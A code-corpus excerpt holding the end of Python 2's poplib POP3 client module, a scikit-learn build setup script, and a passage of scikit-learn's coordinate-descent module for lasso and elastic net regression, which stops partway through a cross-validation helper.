""" def __init__(self, host, port=POP3_PORT, timeout=socket._GLOBAL_DEFAULT_TIMEOUT): self.host = host self.port = port self.sock = socket.create_connection((host, port), timeout) self.file = self.sock.makefile('rb') self._debugging = 0 self.welcome = self._getresp() def _putline(self, line): if self._debugging > 1: print '*put*', repr(line) self.sock.sendall('%s%s' % (line, CRLF)) # Internal: send one command to the server (through _putline()) def _putcmd(self, line): if self._debugging: print '*cmd*', repr(line) self._putline(line) # Internal: return one line from the server, stripping CRLF. # This is where all the CPU time of this module is consumed. # Raise error_proto('-ERR EOF') if the connection is closed. def _getline(self): line = self.file.readline() if self._debugging > 1: print '*get*', repr(line) if not line: raise error_proto('-ERR EOF') octets = len(line) # server can send any combination of CR & LF # however, 'readline()' returns lines ending in LF # so only possibilities are ...LF, ...CRLF, CR...LF if line[-2:] == CRLF: return line[:-2], octets if line[0] == CR: return line[1:-1], octets return line[:-1], octets # Internal: get a response from the server. # Raise 'error_proto' if the response doesn't start with '+'. def _getresp(self): resp, o = self._getline() if self._debugging > 1: print '*resp*', repr(resp) c = resp[:1] if c != '+': raise error_proto(resp) return resp # Internal: get a response plus following text from the server. 
def _getlongresp(self): resp = self._getresp() list = []; octets = 0 line, o = self._getline() while line != '.': if line[:2] == '..': o = o-1 line = line[1:] octets = octets + o list.append(line) line, o = self._getline() return resp, list, octets # Internal: send a command and get the response def _shortcmd(self, line): self._putcmd(line) return self._getresp() # Internal: send a command and get the response plus following text def _longcmd(self, line): self._putcmd(line) return self._getlongresp() # These can be useful: def getwelcome(self): return self.welcome def set_debuglevel(self, level): self._debugging = level # Here are all the POP commands: def user(self, user): """Send user name, return response (should indicate password required). """ return self._shortcmd('USER %s' % user) def pass_(self, pswd): """Send password, return response (response includes message count, mailbox size). NB: mailbox is locked by server from here to 'quit()' """ return self._shortcmd('PASS %s' % pswd) def stat(self): """Get mailbox status. Result is tuple of 2 ints (message count, mailbox size) """ retval = self._shortcmd('STAT') rets = retval.split() if self._debugging: print '*stat*', repr(rets) numMessages = int(rets[1]) sizeMessages = int(rets[2]) return (numMessages, sizeMessages) def list(self, which=None): """Request listing, return result. Result without a message number argument is in form ['response', ['mesg_num octets', ...], octets]. Result when a message number argument is given is a single response: the "scan listing" for that message. """ if which is not None: return self._shortcmd('LIST %s' % which) return self._longcmd('LIST') def retr(self, which): """Retrieve whole message number 'which'. Result is in form ['response', ['line', ...], octets]. """ return self._longcmd('RETR %s' % which) def dele(self, which): """Delete message number 'which'. Result is 'response'. """ return self._shortcmd('DELE %s' % which) def noop(self): """Does nothing. 
One supposes the response indicates the server is alive. """ return self._shortcmd('NOOP') def rset(self): """Unmark all messages marked for deletion.""" return self._shortcmd('RSET') def quit(self): """Signoff: commit changes on server, unlock mailbox, close connection.""" try: resp = self._shortcmd('QUIT') except error_proto, val: resp = val self.file.close() self.sock.close() del self.file, self.sock return resp #__del__ = quit # optional commands: def rpop(self, user): """Not sure what this does.""" return self._shortcmd('RPOP %s' % user) timestamp = re.compile(r'\+OK.*(<[^>]+>)') def apop(self, user, secret): """Authorisation - only possible if server has supplied a timestamp in initial greeting. Args: user - mailbox user; secret - secret shared between client and server. NB: mailbox is locked by server from here to 'quit()' """ m = self.timestamp.match(self.welcome) if not m: raise error_proto('-ERR APOP not supported by server') import hashlib digest = hashlib.md5(m.group(1)+secret).digest() digest = ''.join(map(lambda x:'%02x'%ord(x), digest)) return self._shortcmd('APOP %s %s' % (user, digest)) def top(self, which, howmuch): """Retrieve message header of message number 'which' and first 'howmuch' lines of message body. Result is in form ['response', ['line', ...], octets]. """ return self._longcmd('TOP %s %s' % (which, howmuch)) def uidl(self, which=None): """Return message digest (unique id) list. 
If 'which', result contains unique id for that message in the form 'response mesgnum uid', otherwise result is the list ['response', ['mesgnum uid', ...], octets] """ if which is not None: return self._shortcmd('UIDL %s' % which) return self._longcmd('UIDL') try: import ssl except ImportError: pass else: class POP3_SSL(POP3): """POP3 client class over SSL connection Instantiate with: POP3_SSL(hostname, port=995, keyfile=None, certfile=None) hostname - the hostname of the pop3 over ssl server port - port number keyfile - PEM formatted file that countains your private key certfile - PEM formatted certificate chain file See the methods of the parent class POP3 for more documentation. """ def __init__(self, host, port = POP3_SSL_PORT, keyfile = None, certfile = None): self.host = host self.port = port self.keyfile = keyfile self.certfile = certfile self.buffer = "" msg = "getaddrinfo returns an empty list" self.sock = None for res in socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: self.sock = socket.socket(af, socktype, proto) self.sock.connect(sa) except socket.error, msg: if self.sock: self.sock.close() self.sock = None continue break if not self.sock: raise socket.error, msg self.file = self.sock.makefile('rb') self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile) self._debugging = 0 self.welcome = self._getresp() def _fillBuffer(self): localbuf = self.sslobj.read() if len(localbuf) == 0: raise error_proto('-ERR EOF') self.buffer += localbuf def _getline(self): line = "" renewline = re.compile(r'.*?\n') match = renewline.match(self.buffer) while not match: self._fillBuffer() match = renewline.match(self.buffer) line = match.group(0) self.buffer = renewline.sub('' ,self.buffer, 1) if self._debugging > 1: print '*get*', repr(line) octets = len(line) if line[-2:] == CRLF: return line[:-2], octets if line[0] == CR: return line[1:-1], octets return line[:-1], octets def _putline(self, line): 
if self._debugging > 1: print '*put*', repr(line) line += CRLF bytes = len(line) while bytes > 0: sent = self.sslobj.write(line) if sent == bytes: break # avoid copy line = line[sent:] bytes = bytes - sent def quit(self): """Signoff: commit changes on server, unlock mailbox, close connection.""" try: resp = self._shortcmd('QUIT') except error_proto, val: resp = val self.sock.close() del self.sslobj, self.sock return resp __all__.append("POP3_SSL") if __name__ == "__main__": import sys a = POP3(sys.argv[1]) print a.getwelcome() a.user(sys.argv[2]) a.pass_(sys.argv[3]) a.list() (numMsgs, totalSize) = a.stat() for i in range(1, numMsgs + 1): (header, msg, octets) = a.retr(i) print "Message %d:" % i for line in msg: print ' ' + line print '-----------------------' a.quit()
chrsrds/scikit-learn
refs/heads/master
sklearn/__check_build/setup.py
113
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
# License: BSD 3 clause

import numpy


def configuration(parent_package='', top_path=None):
    """Return the numpy.distutils build configuration for __check_build.

    Declares the single Cython extension ``_check_build`` compiled against
    the NumPy headers.
    """
    from numpy.distutils.misc_util import Configuration

    cfg = Configuration('__check_build', parent_package, top_path)
    ext_options = dict(
        sources=['_check_build.pyx'],
        include_dirs=[numpy.get_include()],
    )
    cfg.add_extension('_check_build', **ext_options)
    return cfg


if __name__ == '__main__':
    from numpy.distutils.core import setup

    setup(**configuration(top_path='').todict())
ashhher3/scikit-learn
refs/heads/master
sklearn/linear_model/coordinate_descent.py
4
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Fabian Pedregosa <fabian.pedregosa@inria.fr> # Olivier Grisel <olivier.grisel@ensta.org> # Gael Varoquaux <gael.varoquaux@inria.fr> # # License: BSD 3 clause import sys import warnings from abc import ABCMeta, abstractmethod import numpy as np from scipy import sparse from .base import LinearModel, _pre_fit from ..base import RegressorMixin from .base import center_data, sparse_center_data from ..utils import check_array, check_X_y from ..utils.validation import check_random_state from ..cross_validation import _check_cv as check_cv from ..externals.joblib import Parallel, delayed from ..externals import six from ..externals.six.moves import xrange from ..utils.extmath import safe_sparse_dot from ..utils.validation import check_is_fitted from ..utils import ConvergenceWarning from . import cd_fast ############################################################################### # Paths functions def _alpha_grid(X, y, Xy=None, l1_ratio=1.0, fit_intercept=True, eps=1e-3, n_alphas=100, normalize=False, copy_X=True): """ Compute the grid of alpha values for elastic net parameter search Parameters ---------- X : {array-like, sparse matrix}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication y : ndarray, shape = (n_samples,) Target values Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. l1_ratio : float The elastic net mixing parameter, with ``0 <= l1_ratio <= 1``. For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2. eps : float, optional Length of the path. 
``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path fit_intercept : bool Fit or not an intercept normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. """ n_samples = len(y) sparse_center = False if Xy is None: X_sparse = sparse.isspmatrix(X) sparse_center = X_sparse and (fit_intercept or normalize) X = check_array(X, 'csc', copy=(copy_X and fit_intercept and not X_sparse)) if not X_sparse: # X can be touched inplace thanks to the above line X, y, _, _, _ = center_data(X, y, fit_intercept, normalize, copy=False) Xy = safe_sparse_dot(X.T, y, dense_output=True) if sparse_center: # Workaround to find alpha_max for sparse matrices. # since we should not destroy the sparsity of such matrices. _, _, X_mean, _, X_std = sparse_center_data(X, y, fit_intercept, normalize) mean_dot = X_mean * np.sum(y) if Xy.ndim == 1: Xy = Xy[:, np.newaxis] if sparse_center: if fit_intercept: Xy -= mean_dot[:, np.newaxis] if normalize: Xy /= X_std[:, np.newaxis] alpha_max = (np.sqrt(np.sum(Xy ** 2, axis=1)).max() / (n_samples * l1_ratio)) alphas = np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max), num=n_alphas)[::-1] return alphas def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None, precompute='auto', Xy=None, copy_X=True, coef_init=None, verbose=False, return_n_iter=False, positive=False, **params): """Compute Lasso path with coordinate descent The Lasso optimization function varies for mono and multi-outputs. For mono-output tasks it is:: (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1 For multi-output tasks it is:: (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. 
Parameters ---------- X : {array-like, sparse matrix}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication. If ``y`` is mono-output then ``X`` can be sparse. y : ndarray, shape = (n_samples,), or (n_samples, n_outputs) Target values eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path alphas : ndarray, optional List of alphas where to compute the models. If ``None`` alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. It is useful only when the Gram matrix is precomputed. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. coef_init : array, shape (n_features, ) | None The initial values of the coefficients. verbose : bool or integer Amount of verbosity. params : kwargs keyword arguments passed to the coordinate descent solver. positive : bool, default False If set to True, forces coefficients to be positive. return_n_iter : bool whether to return the number of iterations or not. Returns ------- alphas : array, shape (n_alphas,) The alphas along the path where models are computed. coefs : array, shape (n_features, n_alphas) or (n_outputs, n_features, n_alphas) Coefficients along the path. dual_gaps : array, shape (n_alphas,) The dual gaps at the end of the optimization for each alpha. n_iters : array-like, shape (n_alphas,) The number of iterations taken by the coordinate descent optimizer to reach the specified tolerance for each alpha. Notes ----- See examples/linear_model/plot_lasso_coordinate_descent_path.py for an example. 
To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. Note that in certain cases, the Lars solver may be significantly faster to implement this functionality. In particular, linear interpolation can be used to retrieve model coefficients between the values output by lars_path Examples --------- Comparing lasso_path and lars_path with interpolation: >>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T >>> y = np.array([1, 2, 3.1]) >>> # Use lasso_path to compute a coefficient path >>> _, coef_path, _ = lasso_path(X, y, alphas=[5., 1., .5]) >>> print(coef_path) [[ 0. 0. 0.46874778] [ 0.2159048 0.4425765 0.23689075]] >>> # Now use lars_path and 1D linear interpolation to compute the >>> # same path >>> from sklearn.linear_model import lars_path >>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso') >>> from scipy import interpolate >>> coef_path_continuous = interpolate.interp1d(alphas[::-1], ... coef_path_lars[:, ::-1]) >>> print(coef_path_continuous([5., 1., .5])) [[ 0. 0. 0.46915237] [ 0.2159048 0.4425765 0.23668876]] See also -------- lars_path Lasso LassoLars LassoCV LassoLarsCV sklearn.decomposition.sparse_encode """ return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas, alphas=alphas, precompute=precompute, Xy=Xy, copy_X=copy_X, coef_init=coef_init, verbose=verbose, positive=positive, **params) def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None, precompute='auto', Xy=None, copy_X=True, coef_init=None, verbose=False, return_n_iter=False, positive=False, **params): """Compute elastic net path with coordinate descent The elastic net optimization function varies for mono and multi-outputs. 
For mono-output tasks it is:: 1 / (2 * n_samples) * ||y - Xw||^2_2 + + alpha * l1_ratio * ||w||_1 + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2 For multi-output tasks it is:: (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * l1_ratio * ||W||_21 + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- X : {array-like}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication. If ``y`` is mono-output then ``X`` can be sparse. y : ndarray, shape = (n_samples,) or (n_samples, n_outputs) Target values l1_ratio : float, optional float between 0 and 1 passed to elastic net (scaling between l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso eps : float Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path alphas : ndarray, optional List of alphas where to compute the models. If None alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. It is useful only when the Gram matrix is precomputed. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. coef_init : array, shape (n_features, ) | None The initial values of the coefficients. verbose : bool or integer Amount of verbosity. params : kwargs keyword arguments passed to the coordinate descent solver. return_n_iter : bool whether to return the number of iterations or not. positive : bool, default False If set to True, forces coefficients to be positive. Returns ------- alphas : array, shape (n_alphas,) The alphas along the path where models are computed. 
coefs : array, shape (n_features, n_alphas) or (n_outputs, n_features, n_alphas) Coefficients along the path. dual_gaps : array, shape (n_alphas,) The dual gaps at the end of the optimization for each alpha. n_iters : array-like, shape (n_alphas,) The number of iterations taken by the coordinate descent optimizer to reach the specified tolerance for each alpha. (Is returned when ``return_n_iter`` is set to True). Notes ----- See examples/plot_lasso_coordinate_descent_path.py for an example. See also -------- MultiTaskElasticNet MultiTaskElasticNetCV ElasticNet ElasticNetCV """ X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X) n_samples, n_features = X.shape multi_output = False if y.ndim != 1: multi_output = True _, n_outputs = y.shape # MultiTaskElasticNet does not support sparse matrices if not multi_output and sparse.isspmatrix(X): if 'X_mean' in params: # As sparse matrices are not actually centered we need this # to be passed to the CD solver. X_sparse_scaling = params['X_mean'] / params['X_std'] else: X_sparse_scaling = np.zeros(n_features) # X should be normalized and fit already. 
X, y, X_mean, y_mean, X_std, precompute, Xy = \ _pre_fit(X, y, Xy, precompute, normalize=False, fit_intercept=False, copy=False) if alphas is None: # No need to normalize of fit_intercept: it has been done # above alphas = _alpha_grid(X, y, Xy=Xy, l1_ratio=l1_ratio, fit_intercept=False, eps=eps, n_alphas=n_alphas, normalize=False, copy_X=False) else: alphas = np.sort(alphas)[::-1] # make sure alphas are properly ordered n_alphas = len(alphas) tol = params.get('tol', 1e-4) max_iter = params.get('max_iter', 1000) dual_gaps = np.empty(n_alphas) n_iters = [] rng = check_random_state(params.get('random_state', None)) selection = params.get('selection', 'cyclic') if selection not in ['random', 'cyclic']: raise ValueError("selection should be either random or cyclic.") random = (selection == 'random') models = [] if not multi_output: coefs = np.empty((n_features, n_alphas), dtype=np.float64) else: coefs = np.empty((n_outputs, n_features, n_alphas), dtype=np.float64) if coef_init is None: coef_ = np.asfortranarray(np.zeros(coefs.shape[:-1])) else: coef_ = np.asfortranarray(coef_init) for i, alpha in enumerate(alphas): l1_reg = alpha * l1_ratio * n_samples l2_reg = alpha * (1.0 - l1_ratio) * n_samples if not multi_output and sparse.isspmatrix(X): model = cd_fast.sparse_enet_coordinate_descent( coef_, l1_reg, l2_reg, X.data, X.indices, X.indptr, y, X_sparse_scaling, max_iter, tol, rng, random, positive) elif multi_output: model = cd_fast.enet_coordinate_descent_multi_task( coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random) elif isinstance(precompute, np.ndarray): model = cd_fast.enet_coordinate_descent_gram( coef_, l1_reg, l2_reg, precompute, Xy, y, max_iter, tol, rng, random, positive) elif precompute is False: model = cd_fast.enet_coordinate_descent( coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random, positive) else: raise ValueError("Precompute should be one of True, False, " "'auto' or array-like") coef_, dual_gap_, eps_, n_iter_ = model coefs[..., i] = coef_ 
dual_gaps[i] = dual_gap_ n_iters.append(n_iter_) if dual_gap_ > eps_: warnings.warn('Objective did not converge.' + ' You might want' + ' to increase the number of iterations', ConvergenceWarning) if verbose: if verbose > 2: print(model) elif verbose > 1: print('Path: %03i out of %03i' % (i, n_alphas)) else: sys.stderr.write('.') if return_n_iter: return alphas, coefs, dual_gaps, n_iters return alphas, coefs, dual_gaps ############################################################################### # ElasticNet model class ElasticNet(LinearModel, RegressorMixin): """Linear regression with combined L1 and L2 priors as regularizer. Minimizes the objective function:: 1 / (2 * n_samples) * ||y - Xw||^2_2 + + alpha * l1_ratio * ||w||_1 + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2 If you are interested in controlling the L1 and L2 penalty separately, keep in mind that this is equivalent to:: a * L1 + b * L2 where:: alpha = a + b and l1_ratio = a / (a + b) The parameter l1_ratio corresponds to alpha in the glmnet R package while alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio = 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable, unless you supply your own sequence of alpha. Parameters ---------- alpha : float Constant that multiplies the penalty terms. Defaults to 1.0 See the notes for the exact mathematical meaning of this parameter. ``alpha = 0`` is equivalent to an ordinary least square, solved by the :class:`LinearRegression` object. For numerical reasons, using ``alpha = 0`` with the Lasso object is not advised and you should prefer the LinearRegression object. l1_ratio : float The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2. fit_intercept : bool Whether the intercept should be estimated or not. If ``False``, the data is assumed to be already centered. 
normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. For sparse input this option is always ``True`` to preserve sparsity. WARNING : The ``'auto'`` option is deprecated and will be removed in 0.18. max_iter : int, optional The maximum number of iterations copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. warm_start : bool, optional When set to ``True``, reuse the solution of the previous call to fit as initialization, otherwise, just erase the previous solution. positive : bool, optional When set to ``True``, forces the coefficients to be positive. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- coef_ : array, shape = (n_features,) | (n_targets, n_features) parameter vector (w in the cost function formula) sparse_coef_ : scipy.sparse matrix, shape = (n_features, 1) | \ (n_targets, n_features) ``sparse_coef_`` is a readonly property derived from ``coef_`` intercept_ : float | array, shape = (n_targets,) independent term in decision function. 
    n_iter_ : array-like, shape (n_targets,)
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Notes
    -----
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    See also
    --------
    SGDRegressor: implements elastic net regression with incremental training.
    SGDClassifier: implements logistic regression with elastic net penalty
        (``SGDClassifier(loss="log", penalty="elasticnet")``).
    """
    path = staticmethod(enet_path)

    def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
                 normalize=False, precompute=False, max_iter=1000,
                 copy_X=True, tol=1e-4, warm_start=False, positive=False,
                 random_state=None, selection='cyclic'):
        self.alpha = alpha
        self.l1_ratio = l1_ratio
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        self.positive = positive
        self.intercept_ = 0.0
        self.random_state = random_state
        self.selection = selection

    def fit(self, X, y):
        """Fit model with coordinate descent.

        Parameters
        -----------
        X : ndarray or scipy.sparse matrix, (n_samples, n_features)
            Data

        y : ndarray, shape = (n_samples,) or (n_samples, n_targets)
            Target

        Notes
        -----

        Coordinate descent is an algorithm that considers each column of
        data at a time hence it will automatically convert the X input
        as a Fortran-contiguous numpy array if necessary.

        To avoid memory re-allocation it is advised to allocate the
        initial data in memory directly using that format.
        """
        if self.alpha == 0:
            warnings.warn("With alpha=0, this algorithm does not converge "
                          "well. You are advised to use the LinearRegression "
                          "estimator", stacklevel=2)

        if self.precompute == 'auto':
            warnings.warn("Setting precompute to 'auto', was found to be "
                          "slower even when n_samples > n_features. Hence "
                          "it will be removed in 0.18.",
                          DeprecationWarning, stacklevel=2)

        X, y = check_X_y(X, y, accept_sparse='csc', dtype=np.float64,
                         order='F',
                         copy=self.copy_X and self.fit_intercept,
                         multi_output=True)

        X, y, X_mean, y_mean, X_std, precompute, Xy = \
            _pre_fit(X, y, None, self.precompute, self.normalize,
                     self.fit_intercept, copy=True)

        # Normalize shapes so that the multi-target code path below can be
        # used for the single-target case as well.
        if y.ndim == 1:
            y = y[:, np.newaxis]
        if Xy is not None and Xy.ndim == 1:
            Xy = Xy[:, np.newaxis]

        n_samples, n_features = X.shape
        n_targets = y.shape[1]

        if self.selection not in ['cyclic', 'random']:
            raise ValueError("selection should be either random or cyclic.")

        if not self.warm_start or self.coef_ is None:
            coef_ = np.zeros((n_targets, n_features), dtype=np.float64,
                             order='F')
        else:
            # Warm start from the previous solution.
            coef_ = self.coef_
            if coef_.ndim == 1:
                coef_ = coef_[np.newaxis, :]

        dual_gaps_ = np.zeros(n_targets, dtype=np.float64)

        self.n_iter_ = []

        # Solve one coordinate-descent problem per target, each on the
        # single-alpha "path" [self.alpha].
        for k in xrange(n_targets):
            if Xy is not None:
                this_Xy = Xy[:, k]
            else:
                this_Xy = None
            _, this_coef, this_dual_gap, this_iter = \
                self.path(X, y[:, k],
                          l1_ratio=self.l1_ratio, eps=None,
                          n_alphas=None, alphas=[self.alpha],
                          precompute=precompute, Xy=this_Xy,
                          fit_intercept=False, normalize=False, copy_X=True,
                          verbose=False, tol=self.tol, positive=self.positive,
                          X_mean=X_mean, X_std=X_std, return_n_iter=True,
                          coef_init=coef_[k], max_iter=self.max_iter,
                          random_state=self.random_state,
                          selection=self.selection)
            coef_[k] = this_coef[:, 0]
            dual_gaps_[k] = this_dual_gap[0]
            self.n_iter_.append(this_iter[0])

        if n_targets == 1:
            self.n_iter_ = self.n_iter_[0]

        self.coef_, self.dual_gap_ = map(np.squeeze, [coef_, dual_gaps_])
        self._set_intercept(X_mean, y_mean, X_std)

        # return self for chaining fit and predict calls
        return self

    @property
    def sparse_coef_(self):
        """ sparse representation of the fitted coef """
        return sparse.csr_matrix(self.coef_)

    def decision_function(self, X):
        """Decision function of the linear model

        Parameters
        ----------
        X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)

        Returns
        -------
        T : array, shape = (n_samples,)
            The predicted decision function
        """
        check_is_fitted(self, 'n_iter_')
        if sparse.isspmatrix(X):
            # Sparse input: compute the dot product directly to avoid
            # densifying X.
            return np.ravel(safe_sparse_dot(self.coef_, X.T,
                                            dense_output=True)
                            + self.intercept_)
        else:
            return super(ElasticNet, self).decision_function(X)


###############################################################################
# Lasso model

class Lasso(ElasticNet):
    """Linear Model trained with L1 prior as regularizer (aka the Lasso)

    The optimization objective for Lasso is::

        (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1

    Technically the Lasso model is optimizing the same objective function as
    the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty).

    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1 term. Defaults to 1.0.
        ``alpha = 0`` is equivalent to an ordinary least square, solved
        by the :class:`LinearRegression` object. For numerical
        reasons, using ``alpha = 0`` with the Lasso object is not advised
        and you should prefer the LinearRegression object.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument. For sparse input
        this option is always ``True`` to preserve sparsity.
        WARNING : The ``'auto'`` option is deprecated and will
        be removed in 0.18.
    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    warm_start : bool, optional
        When set to True, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.

    positive : bool, optional
        When set to ``True``, forces the coefficients to be positive.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    coef_ : array, shape = (n_features,) | (n_targets, n_features)
        parameter vector (w in the cost function formula)

    sparse_coef_ : scipy.sparse matrix, shape = (n_features, 1) | \
            (n_targets, n_features)
        ``sparse_coef_`` is a readonly property derived from ``coef_``

    intercept_ : float | array, shape = (n_targets,)
        independent term in decision function.

    n_iter_ : int | array-like, shape (n_targets,)
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.Lasso(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2])
    Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
       normalize=False, positive=False, precompute=False, random_state=None,
       selection='cyclic', tol=0.0001, warm_start=False)
    >>> print(clf.coef_)
    [ 0.85  0.  ]
    >>> print(clf.intercept_)
    0.15

    See also
    --------
    lars_path
    lasso_path
    LassoLars
    LassoCV
    LassoLarsCV
    sklearn.decomposition.sparse_encode

    Notes
    -----
    The algorithm used to fit the model is coordinate descent.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    path = staticmethod(enet_path)

    def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
                 precompute=False, copy_X=True, max_iter=1000,
                 tol=1e-4, warm_start=False, positive=False,
                 random_state=None, selection='cyclic'):
        # Lasso is ElasticNet with the L1/L2 mix fixed at pure L1.
        super(Lasso, self).__init__(
            alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept,
            normalize=normalize, precompute=precompute, copy_X=copy_X,
            max_iter=max_iter, tol=tol, warm_start=warm_start,
            positive=positive, random_state=random_state,
            selection=selection)


###############################################################################
# Functions for CV with paths functions

def _path_residuals(X, y, train, test, path, path_params, alphas=None,
                    l1_ratio=1, X_order=None, dtype=None):
    """Returns the MSE for the models computed by 'path'

    Parameters
    ----------
    X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training data.

    y : array-like, shape (n_samples,) or (n_samples, n_targets)
        Target values

    train : list of indices
        The indices of the train set

    test : list of indices
        The indices of the test set

    path : callable
        function returning a list of models on the path. See
        enet_path for an example of signature

    path_params : dictionary
        Parameters passed to the path function

    alphas : array-like, optional
        Array of float that is used for cross-validation. If not
        provided, computed using 'path'

    l1_ratio : float, optional
        float between 0 and 1 passed to ElasticNet (scaling between
        l1 and l2 penalties). For ``l1_ratio = 0`` the penalty is an
        L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty. For
        ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2

    X_order : {'F', 'C', or None}, optional
        The order of the arrays expected by the path function to
        avoid memory copies

    dtype : a numpy dtype or None
        The dtype of the arrays expected by the path function to
        avoid memory copies
    """
    X_train = X[train]
    y_train = y[train]
    X_test = X[test]
    y_test = y[test]
    fit_intercept = path_params['fit_intercept']
    normalize = path_params['normalize']

    if y.ndim == 1:
        precompute = path_params['precompute']
    else:
        # No Gram variant of multi-task exists right now.
        # Fall back to default enet_multitask
        precompute = False

    X_train, y_train, X_mean, y_mean, X_std, precompute, Xy = \
        _pre_fit(X_train, y_train, None, precompute, normalize, fit_intercept,
                 copy=False)

    path_params = path_params.copy()
    path_params['Xy'] = Xy
    path_params['X_mean'] = X_mean
